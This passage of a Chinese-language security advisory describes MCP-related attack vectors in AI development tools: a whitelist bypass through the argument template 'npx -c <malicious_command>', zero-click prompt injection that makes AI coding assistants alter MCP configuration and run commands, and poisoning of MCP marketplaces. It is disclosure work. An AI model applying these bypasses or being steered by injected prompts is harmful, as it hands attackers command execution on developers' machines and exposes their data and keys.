0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">影响范围</span></strong><span leaf="">：</span></p><ul style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px 0px 0px 1em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);list-style: circle;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 所有版本的LangFlow（IBM开源低代码AI应用框架）</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• GPT Researcher（开源深度研究AI代理）</span></p></li></ul><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">技术影响</span></strong><span leaf="">：攻击者可获得目标服务器完整控制权，访问敏感用户数据、内部数据库、API密钥及聊天记录。</span></p><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">CVE关联</span></strong><span leaf="">：CVE-2025-65720（GPT Researcher）</span></p><h3 style="display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">攻击向量二：加固绕过攻击</span></h3><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">技术描述</span></strong><span leaf="">：部分MCP实现已尝试通过白名单机制加固，仅允许特定命令（如&#34;python&#34;、&#34;npm&#34;、&#34;npx&#34;）通过&#34;command&#34;参数执行。攻击者可利用这些&#34;安全&#34;命令的参数注入能力绕过限制。</span></p><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">绕过技术</span></strong><span leaf="">：</span></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="xml"><code><span leaf="">npx -c <span class="code-snippet__tag">&lt;</span><span class="code-snippet__tag"><span class="code-snippet__name">malicious_command</span></span><span class="code-snippet__tag">&gt;</span></span></code></pre></p><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><span leaf="">通过在允许命令的子参数中传入恶意内容，攻击者可间接执行任意命令，将白名单防护形同虚设。</span></p><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">受影响项目</span></strong><span leaf="">：</span></p><ul style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px 0px 0px 1em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);list-style: circle;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• Upsonic（CVE-2026-30625）</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• Flowise（GHSA-c9gw-hvqq-f33r）</span></p></li></ul><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">威胁影响</span></strong><span leaf="">：即便开发者已实施基础安全加固措施，该漏洞仍可导致完整的命令注入和系统接管。</span></p><h3 style="display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">攻击向量三：零点击提示词注入</span></h3><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">技术描述</span></strong><span leaf="">：在AI集成开发环境（IDE）和编程助手中，用户输入的提示词可直接影响MCP JSON配置，无需用户任何额外交互即可触发漏洞。</span></p><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">受影响产品</span></strong><span leaf="">：</span></p><ul style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px 0px 0px 1em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);list-style: circle;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• Windsurf（CVE-2026-30615）</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• Claude Code</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• Cursor</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• Gemini-CLI</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• GitHub Copilot</span></p></li></ul><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">威胁特征</span></strong><span leaf="">：这是唯一真正的零点击攻击向量。用户仅需正常与AI助手对话，恶意构造的提示词即可触发MCP配置变更，进而执行任意命令。</span></p><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">厂商态度</span></strong><span leaf="">：Google、Microsoft及Anthropic均将此问题定性为&#34;已知限制&#34;或&#34;非有效漏洞&#34;，理由是修改配置需要用户明确授权。奇安信认为这一判断存在重大偏差——用户授权的是与AI进行对话交互，而非授权系统执行任意命令。</span></p><h3 style="display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">攻击向量四：MCP市场供应链投毒</span></h3><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">技术描述</span></strong><span leaf="">：MCP市场允许开发者发布和分发MCP工具包，攻击者可向市场提交内含恶意命令的MCP包。研究团队测试结果显示：</span></p><ul style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px 0px 0px 1em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);list-style: circle;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 测试样本：11个MCP市场</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 投毒成功：9个市场</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 概念验证：植入可执行任意命令的MCP包（测试使用创建空文件）</span></p></li></ul><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">危害评估</span></strong><span leaf="">：</span></p><ul style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px 0px 0px 1em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);list-style: circle;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 目标市场月访问量达数十万级别</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 单个恶意MCP包可在被发现前被数千开发者安装</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">• 每次安装即为攻击者提供目标机器的完整命令执行权限</span></p></li></ul><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">攻击场景</span></strong><span leaf="">：这是一个典型的供应链投毒模式。攻击者只需成功提交一个恶意MCP包，即可实现对大量下游开发环境的规模化入侵。</span></p><h2 style="padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">MITRE ATT&amp;CK战术技术映射</span></h2><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><span leaf="">奇安信威胁情报团队将该漏洞相关攻击活动映射至MITRE ATT&amp;CK框架：</span></p><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;line-height: 1.75;text-align: left;color: rgb(10, 10, 10);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: 